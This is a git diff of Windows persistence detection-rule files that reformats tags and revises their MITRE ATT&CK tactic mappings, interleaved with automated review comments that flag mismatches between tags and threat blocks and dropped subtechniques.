"Application Shimming" -reference = "https://attack.mitre.org/techniques/T1546/011/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" 
diff --git a/rules/windows/persistence_appcertdlls_registry.toml b/rules/windows/persistence_appcertdlls_registry.toml index cd530d7df31..7cad2254650 100644 --- a/rules/windows/persistence_appcertdlls_registry.toml +++ b/rules/windows/persistence_appcertdlls_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -61,7 +61,20 @@ AppCert DLLs are dynamic link libraries that can be configured to load with ever risk_score = 47 rule_id = "513f0ffd-b317-4b9c-9494-92ce861f22c7" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: SentinelOne", "Data Source: Microsoft Defender for Endpoint", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -73,18 +86,36 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.009" name = "AppCert DLLs" reference = "https://attack.mitre.org/techniques/T1546/009/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1546" +name = "Event Triggered Execution" +reference = "https://attack.mitre.org/techniques/T1546/" +[[rule.threat.technique.subtechnique]] +id = "T1546.009" +name = "AppCert DLLs" +reference = "https://attack.mitre.org/techniques/T1546/009/" + + + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_appinitdlls_registry.toml b/rules/windows/persistence_appinitdlls_registry.toml index f123fa5bc79..350bb9b904f 100644 --- a/rules/windows/persistence_appinitdlls_registry.toml +++ b/rules/windows/persistence_appinitdlls_registry.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/28" [transform] [[transform.osquery]] 
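Review bot: The handling of Privilege Escalation for the `T1546` Event Triggered Execution rules is inconsistent across this series: this hunk for persistence_appcertdlls_registry.toml adds a second `[[rule.threat]]` block mapping `T1546.009` to `TA0004` Privilege Escalation (with the matching `"Tactic: Privilege Escalation"` tag added on the previous line), while the app_compat_shim hunk (`@@ -87,36 +99,19 @@`) removes exactly that pairing for `T1546.011`, and the appinitdlls (`@@ -153,18 +166,31 @@`) and ifeo (`@@ -91,36 +104,31 @@`) hunks swap it for a Defense Evasion `T1112` block instead. ATT&CK lists T1546 under both Persistence and Privilege Escalation, so whichever choice is made should be applied uniformly to the four sibling rules or the rationale recorded in the commit message. Within this hunk the new block also begins directly after the previous tactic's `reference` line with no separating blank, which differs from the rest of the file.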
@@ -116,7 +116,20 @@ This rule identifies modifications on the AppInit registry keys. risk_score = 47 rule_id = "d0e159cf-73e9-40d1-a9ed-077e3158a855" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -153,18 +166,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.010" name = "AppInit DLLs" reference = "https://attack.mitre.org/techniques/T1546/010/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_browser_extension_install.toml b/rules/windows/persistence_browser_extension_install.toml index be533d6a05b..2141ad620c4 100644 --- a/rules/windows/persistence_browser_extension_install.toml 
+++ b/rules/windows/persistence_browser_extension_install.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/22" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/01" [rule] author = ["Elastic"] @@ -115,18 +115,14 @@ file where host.os.type == "windows" and event.type : "creation" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1176" name = "Software Extensions" reference = "https://attack.mitre.org/techniques/T1176/" -[[rule.threat.technique.subtechnique]] -id = "T1176.001" -name = "Browser Extensions" -reference = "https://attack.mitre.org/techniques/T1176/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_evasion_hidden_local_account_creation.toml b/rules/windows/persistence_evasion_hidden_local_account_creation.toml index deb5c340772..d53df13516f 100644 --- a/rules/windows/persistence_evasion_hidden_local_account_creation.toml +++ b/rules/windows/persistence_evasion_hidden_local_account_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
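Review bot: Dropping the `T1176.001` Browser Extensions subtechnique from persistence_browser_extension_install.toml and keeping only the parent `T1176` Software Extensions loses precision in the rule's ATT&CK mapping. The rule is specifically about browser extension installs, so the subtechnique is the more accurate entry; confirm the removal is intentional (it may be driven by the ATT&CK version the test suite pins, which is outside this hunk). If not, keep `id = "T1176.001"` / `name = "Browser Extensions"` / `reference = "https://attack.mitre.org/techniques/T1176/001/"` under T1176.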
@@ -58,7 +58,19 @@ references = [ risk_score = 73 rule_id = "2edc8076-291e-41e9-81e4-e3fcbc97ae5e" severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Resources: Investigation Guide", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", +] timestamp_override = "event.ingested" type = "eql" @@ -74,36 +86,19 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" - -[[rule.threat.technique.subtechnique]] -id = "T1564.002" -name = "Hidden Users" -reference = "https://attack.mitre.org/techniques/T1564/002/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1136" name = "Create Account" reference = "https://attack.mitre.org/techniques/T1136/" - [[rule.threat.technique.subtechnique]] id = "T1136.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1136/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/windows/persistence_evasion_registry_ifeo_injection.toml b/rules/windows/persistence_evasion_registry_ifeo_injection.toml index d3bf98a2e64..cdf2e8f627a 100644 
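Review bot: Removing the Defense Evasion mapping from persistence_evasion_hidden_local_account_creation.toml deletes the technique that describes the rule's distinguishing behaviour: the tags hunk drops `"Tactic: Defense Evasion"` and the threat hunk (`@@ -74,36 +86,19 @@`) deletes the `T1564.002` Hidden Users block with `TA0005`, leaving only `T1136.001` Local Account under Persistence. The file name frames the detection as a hidden-account evasion, so this block was not a duplicate of the Persistence entry; please confirm the narrowing is intended. The tag and threat changes are at least consistent with each other, so the tactic cross-check will not flag this rule.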
--- a/rules/windows/persistence_evasion_registry_ifeo_injection.toml +++ b/rules/windows/persistence_evasion_registry_ifeo_injection.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/17" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ references = [ risk_score = 47 rule_id = "6839c821-011d-43bd-bd5b-acff00257226" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -91,36 +104,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.012" name = "Image File Execution Options Injection" reference = "https://attack.mitre.org/techniques/T1546/012/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" -[[rule.threat.technique.subtechnique]] -id = "T1546.012" -name = "Image File Execution Options Injection" -reference = "https://attack.mitre.org/techniques/T1546/012/" [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml index 92e133bbe17..078d2f2153c 100644 --- a/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml +++ b/rules/windows/persistence_evasion_registry_startup_shell_folder_modified.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/15" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/09/11" [transform] [[transform.osquery]] 
@@ -161,31 +161,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1112" -name = "Modify Registry" -reference = "https://attack.mitre.org/techniques/T1112/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1547" name = "Boot or Logon Autostart Execution" reference = "https://attack.mitre.org/techniques/T1547/" - [[rule.threat.technique.subtechnique]] id = "T1547.001" name = "Registry Run Keys / Startup Folder" reference = "https://attack.mitre.org/techniques/T1547/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_group_modification_by_system.toml b/rules/windows/persistence_group_modification_by_system.toml index 3a73e312b2b..ddc052d6393 100644 --- a/rules/windows/persistence_group_modification_by_system.toml +++ b/rules/windows/persistence_group_modification_by_system.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/26" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/23" [rule] author = ["Elastic"] 
@@ -55,7 +55,16 @@ Active Directory (AD) is a critical component in Windows environments, managing risk_score = 47 rule_id = "6f024bde-7085-489b-8250-5957efdf1caf" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -70,36 +79,26 @@ not group.id : "S-1-5-21-*-513" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" -[[rule.threat.technique.subtechnique]] -id = "T1098.007" -name = "Additional Local or Domain Groups" -reference = "https://attack.mitre.org/techniques/T1098/007/" [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/windows/persistence_local_scheduled_task_creation.toml b/rules/windows/persistence_local_scheduled_task_creation.toml index 991d2a51efd..e0bda7e66c5 100644 --- a/rules/windows/persistence_local_scheduled_task_creation.toml 
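Review bot: `"Tactic: Privilege Escalation"` is dropped from the tags of persistence_group_modification_by_system.toml, but in the threat hunk (`@@ -70,36 +79,26 @@`) the second `[[rule.threat]]` block still maps `T1098` to `TA0004` Privilege Escalation as unchanged context. That leaves a tactic in `rule.threat` with no matching `Tactic:` tag, which the tag/threat consistency check this series adds would report as missing. Both `[[rule.threat]]` blocks also lose the `T1098.007` Additional Local or Domain Groups subtechnique, which was the precise mapping for group-membership changes; confirm that loss is intended.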
+++ b/rules/windows/persistence_local_scheduled_task_creation.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -60,7 +60,15 @@ references = [ risk_score = 21 rule_id = "afcce5ad-65de-4ed2-8516-5e093d3ac99a" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' @@ -83,36 +91,19 @@ sequence with maxspan=1m [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/windows/persistence_local_scheduled_task_scripting.toml b/rules/windows/persistence_local_scheduled_task_scripting.toml index a12faf74c32..f8f93d54439 100644 --- a/rules/windows/persistence_local_scheduled_task_scripting.toml 
+++ b/rules/windows/persistence_local_scheduled_task_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/29" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] @@ -28,7 +28,17 @@ Decode the base64 encoded Tasks Actions registry value to investigate the task's risk_score = 47 rule_id = "689b9d57-e4d5-4357-ad17-9c334609d79a" severity = "medium" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Endgame", "Data Source: Elastic Defend", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] type = "eql" query = ''' 
@@ -47,18 +57,41 @@ sequence by host.id with maxspan = 30s [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1053" name = "Scheduled Task/Job" reference = "https://attack.mitre.org/techniques/T1053/" - [[rule.threat.technique.subtechnique]] id = "T1053.005" name = "Scheduled Task" reference = "https://attack.mitre.org/techniques/T1053/005/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.005" +name = "Visual Basic" +reference = "https://attack.mitre.org/techniques/T1059/005/" + + + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml b/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml index a4b61f8ccd1..68aedd06281 100644 --- a/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml +++ b/rules/windows/persistence_msds_alloweddelegateto_krbtgt.toml @@ -2,7 +2,7 @@ creation_date = "2022/01/27" integration = ["system", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/14" [rule] author = ["Elastic"] 
@@ -72,7 +72,16 @@ Audit User Account Management (Success,Failure) ``` """ severity = "high" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Use Case: Active Directory Monitoring", "Tactic: Persistence", "Tactic: Privilege Escalation", "Data Source: Active Directory", "Data Source: Windows Security Event Logs", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Use Case: Active Directory Monitoring", + "Data Source: Active Directory", + "Data Source: Windows Security Event Logs", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -83,26 +92,26 @@ iam where host.os.type == "windows" and event.code == "4738" and winlog.event_da [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1098" -name = "Account Manipulation" -reference = "https://attack.mitre.org/techniques/T1098/" +id = "T1558" +name = "Steal or Forge Kerberos Tickets" +reference = "https://attack.mitre.org/techniques/T1558/" + [rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" + diff --git a/rules/windows/persistence_msi_installer_task_startup.toml b/rules/windows/persistence_msi_installer_task_startup.toml index cb71605d295..240595008a9 100644 --- a/rules/windows/persistence_msi_installer_task_startup.toml +++ b/rules/windows/persistence_msi_installer_task_startup.toml 
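Review bot: The new `TA0006` Credential Access tactic in persistence_msds_alloweddelegateto_krbtgt.toml has no matching tag: the threat hunk replaces the Privilege Escalation block with `T1558` Steal or Forge Kerberos Tickets under Credential Access, but the tags hunk on the same line only removes `"Tactic: Privilege Escalation"` and does not add `"Tactic: Credential Access"`. The `Tactic:` tag/threat cross-check introduced earlier in this series would flag this as a missing tag. Add `"Tactic: Credential Access",` after `"Tactic: Persistence",` in the tags list.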
@@ -2,7 +2,7 @@ creation_date = "2024/09/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/01" [rule] author = ["Elastic"] @@ -126,12 +126,27 @@ Windows Installer, through msiexec.exe, facilitates software installation and co [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1053" +name = "Scheduled Task/Job" +reference = "https://attack.mitre.org/techniques/T1053/" +[[rule.threat.technique.subtechnique]] +id = "T1053.005" +name = "Scheduled Task" +reference = "https://attack.mitre.org/techniques/T1053/005/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" - [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" @@ -141,31 +156,3 @@ reference = "https://attack.mitre.org/techniques/T1218/007/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1053" -name = "Scheduled Task/Job" -reference = "https://attack.mitre.org/techniques/T1053/" - -[[rule.threat.technique.subtechnique]] -id = "T1053.005" -name = "Scheduled Task" -reference = "https://attack.mitre.org/techniques/T1053/005/" - -[[rule.threat.technique]] -id = "T1547" -name = "Boot or Logon Autostart Execution" -reference = "https://attack.mitre.org/techniques/T1547/" - -[[rule.threat.technique.subtechnique]] -id = "T1547.001" -name = "Registry Run Keys / Startup Folder" -reference = "https://attack.mitre.org/techniques/T1547/001/" - -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" 
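Review bot: T1547 Boot or Logon Autostart Execution and its sub-technique T1547.001 Registry Run Keys / Startup Folder disappear from the rule's mapping in the threat hunk: the old second Persistence block carried T1053.005 and T1547.001, the new first Persistence block carries only T1053.005. Given the file is named persistence_msi_installer_task_startup, the startup-folder coverage looks deliberate in the original; if the query still matches startup-folder writes, keep a `[[rule.threat.technique]]` entry for T1547 / T1547.001 in the Persistence block, otherwise note the narrowing in the commit message. This file's tag list is not touched in this diff, so whether its tags still match the mapping cannot be checked here.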
diff --git a/rules/windows/persistence_msoffice_startup_registry.toml b/rules/windows/persistence_msoffice_startup_registry.toml index feec07ffa4f..6be85a0e79a 100644 --- a/rules/windows/persistence_msoffice_startup_registry.toml +++ b/rules/windows/persistence_msoffice_startup_registry.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/22" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike", "windows"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] @@ -63,7 +63,20 @@ references = [ risk_score = 21 rule_id = "14dab405-5dd9-450c-8106-72951af2391f" severity = "low" -tags = ["Domain: Endpoint", "OS: Windows", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Microsoft Defender for Endpoint", "Data Source: SentinelOne", "Data Source: Crowdstrike", "Data Source: Sysmon", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: SentinelOne", + "Data Source: Crowdstrike", + "Data Source: Sysmon", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" 
@@ -75,18 +88,31 @@ registry where host.os.type == "windows" and event.action != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" - [[rule.threat.technique.subtechnique]] id = "T1137.002" name = "Office Test" reference = "https://attack.mitre.org/techniques/T1137/002/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_netsh_helper_dll.toml b/rules/windows/persistence_netsh_helper_dll.toml index d74ccf6386f..ea1754b7177 100644 --- a/rules/windows/persistence_netsh_helper_dll.toml +++ b/rules/windows/persistence_netsh_helper_dll.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint", "m365_defender", "sentinel_one_cloud_funnel", "windows", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/08/26" [rule] author = ["Elastic"] 
@@ -87,18 +87,31 @@ registry where host.os.type == "windows" and event.type == "change" and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1546" name = "Event Triggered Execution" reference = "https://attack.mitre.org/techniques/T1546/" - [[rule.threat.technique.subtechnique]] id = "T1546.007" name = "Netsh Helper DLL" reference = "https://attack.mitre.org/techniques/T1546/007/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1112" +name = "Modify Registry" +reference = "https://attack.mitre.org/techniques/T1112/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml index 0f4533e272c..70d8729bfdc 100644 --- a/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml +++ b/rules/windows/persistence_powershell_exch_mailbox_activesync_add_device.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/15" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/20" [rule] author = ["Elastic"] 
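Review bot: No `tags` hunk accompanies the new TA0005 Defense Evasion `[[rule.threat]]` block in this file, so the rule's tag list stays as it was while the tactic mapping grows, unlike persistence_msoffice_startup_registry earlier in the chunk which gained `"Tactic: Defense Evasion"` in the same change. If the existing tags do not already contain `"Tactic: Defense Evasion"`, the threat mapping and tags now disagree; either add that tag or drop the block. The same applies to persistence_registry_uncommon further down, which also gains a TA0005 / T1112 block with no tags change.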
